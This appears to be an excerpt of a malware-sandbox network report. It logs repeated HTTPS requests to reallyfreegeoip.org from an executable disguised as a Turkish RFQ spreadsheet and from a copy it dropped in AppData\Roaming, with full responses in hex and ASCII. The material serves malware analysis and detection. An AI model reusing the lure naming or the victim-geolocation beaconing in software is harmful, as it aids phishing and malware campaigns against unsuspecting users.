2024-10-14 09:05:27 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-14 09:05:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49723	188.114.97.3	443	5724	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-14 09:05:28 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-14 09:05:28 UTC	704	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 09:05:28 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 30804 Last-Modified: Mon, 14 Oct 2024 00:32:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TUZPby8ulW2ofvcgaQuJCeYRTrwxi9KPgyLMqzGkN9U6ynYLQU7sW4SJivcY1r2S7YZVvZVsuG9Z%2B0VgQvrJi1jiK27qpCHj85MzHObRsof1nQIZnGI3WvdWlXlt1ZZJ5nsKv%2Bur"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d266867b816c470-EWR alt-svc: h3=":443"; ma=86400
2024-10-14 09:05:28 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-14 09:05:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49725	188.114.97.3	443	2816	C:\Users\user\AppData\Roaming\qovDEn.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-14 09:05:28 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-14 09:05:28 UTC	712	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 09:05:28 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 30804 Last-Modified: Mon, 14 Oct 2024 00:32:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3lMwynz%2FxYzzAoGDvkug%2Fb453Dxjl1zN7RU9nlFtTdPhuRoqbfNK6uObRZNFO88k1dYP3rQXQd5tAGKQmbyWlCm%2BBbo3IDA7ofQyVrJ%2BOIDKVeiGHjxmBaOqPdD90TUAJt%2BEa%2BPG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d26686b99ba429b-EWR alt-svc: h3=":443"; ma=86400
2024-10-14 09:05:28 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-14 09:05:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	49727	188.114.97.3	443	5724	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-14 09:05:29 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-14 09:05:29 UTC	714	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 09:05:29 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 30805 Last-Modified: Mon, 14 Oct 2024 00:32:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Lif9q6N4uiSEZcJc5dP6JnQY9036DI%2Bc6fEF6jZNz7HkrDn4wE15IPsBd5Tybkc01YdHoki%2BZSbcM0GP5voNiNW1ZqVwjY3docSdWqc%2B%2BNpjEBum%2FUs3I5ywHYEC%2Bj3D5e%2BlzawQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d26686f4cd33350-EWR alt-svc: h3=":443"; ma=86400
2024-10-14 09:05:29 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-14 09:05:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.8	49730	188.114.97.3	443	2816	C:\Users\user\AppData\Roaming\qovDEn.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-14 09:05:30 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-14 09:05:30 UTC	706	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 09:05:30 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 30806 Last-Modified: Mon, 14 Oct 2024 00:32:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5usg8DebdTvw2xU9djHaU%2FsftkH65IFZ4WBPfB81hu%2FviBwAxpbKQbHZR78RRDdXvP8Bd%2BBJw9MJdZh07TjIv0dygWH8kQ0fo9RFI1Q9L8o9iYGOwlpogm82VLIHCBjUOrG45LJ4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d2668733c024376-EWR alt-svc: h3=":443"; ma=86400
2024-10-14 09:05:30 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-14 09:05:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.8	49732	188.114.97.3	443	2816	C:\Users\user\AppData\Roaming\qovDEn.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-14 09:05:31 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-14 09:05:31 UTC	706	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 09:05:31 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 30807 Last-Modified: Mon, 14 Oct 2024 00:32:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kE1VpZ2RNrWCrfmQUiBL3dqAEhowW923dF9llqlM9xPWTSjj3GlpzPuyCRiRcxUE9LXWl%2BLn5kymJIf9Wku%2FTksu5WiNRRi89bFPZp9A2AKi%2BTS7xBHhHqNJ5iCEnQIkzFSR7I0m"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d26687b0bdb4276-EWR alt-svc: h3=":443"; ma=86400
2024-10-14 09:05:31 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-14 09:05:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.8	49733	188.114.97.3	443	5724	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-14 09:05:31 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-14 09:05:31 UTC	706	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 09:05:31 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 30807 Last-Modified: Mon, 14 Oct 2024 00:32:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=te999xm9GlBhxvbiZqL4wczcJnWq1Hb0P2pf8Qb%2F8u98V9sbSXejkU0k0SZh8Ymctchr2PfRcUVsiGQoUyX58O9p8AxQAdPHKZpNH0Qbrb%2Fs1TB3oWypgucbkepp%2B0WB2qqJoNvB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d26687d18568cc5-EWR alt-svc: h3=":443"; ma=86400
2024-10-14 09:05:31 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-14 09:05:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.8	49739	188.114.97.3	443	5724	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-14 09:05:32 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-14 09:05:32 UTC	704	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 09:05:32 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 30808 Last-Modified: Mon, 14 Oct 2024 00:32:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YrEHIlEcuBNr3HtBdsCiAN4QdrktoYGjwadgrOK9DV3nXezQ9BhEMM1U39K%2FlyjoEVoVelH2rb6IkAnKdZl0Et5TrDEF3Atx7zliphGbu4VZMXeYanMmZ9MxZGoPw8LJdsjNU%2B28"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d266884bb03c45c-EWR alt-svc: h3=":443"; ma=86400
2024-10-14 09:05:32 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-14 09:05:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.8	49743	188.114.97.3	443	2816	C:\Users\user\AppData\Roaming\qovDEn.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-14 09:05:33 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-14 09:05:33 UTC	706	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 09:05:33 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 30809 Last-Modified: Mon, 14 Oct 2024 00:32:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HvXSDUw3r5kJbZGi6w%2Bi7jaNJZIQmWZ1FVaGJd1NjQQTf7L6nxKsKU6zlZnKdPvyCr2cm0P67GQVcrAuXjHhDGm4FKbO6AZSuVz%2FLXYfvTHjwUGgzGIBuiCEmCWbe%2BY5tprUU00Z"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d266888dc5942ca-EWR alt-svc: h3=":443"; ma=86400
2024-10-14 09:05:33 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-14 09:05:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.8	49745	188.114.97.3	443	5724	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-14 09:05:34 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-14 09:05:34 UTC	706	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 09:05:34 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 30810 Last-Modified: Mon, 14 Oct 2024 00:32:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1LjUMCluKre8sXgCP0RPzllkHyLWYK67cN1yjzDTAkL6AvpFDaLU4Qq8iela6pSUU7CMWBrM5gGs%2BKK9lyD%2FEjIL2rjrzCTAymJye6VZx7ylc%2BWU0CtJvU4uxL86fqyvGRGKUxqP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d26688c8e3842a1-EWR alt-svc: h3=":443"; ma=86400
2024-10-14 09:05:34 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-14 09:05:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.8	49748	188.114.97.3	443	2816	C:\Users\user\AppData\Roaming\qovDEn.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-14 09:05:34 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-14 09:05:34 UTC	708	IN	HTTP/1.1 200 OK Date: Mon, 14 Oct 2024 09:05:34 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 30810 Last-Modified: Mon, 14 Oct 2024 00:32:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sb5B3u7AQy4XZnS8bX%2FHvb3gSL7ilZaM9qg%2FYpKxKB5YWHewHqZYdFhjciEGsBrLjppWwrEq78PUhBueWhodAq57wt%2BVEDNyvGzDt0OLeGrOuwF%2Fi0s2mW03DKPyeh6sz1dpU8sz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d2668908f770c76-EWR alt-svc: h3=":443"; ma=86400
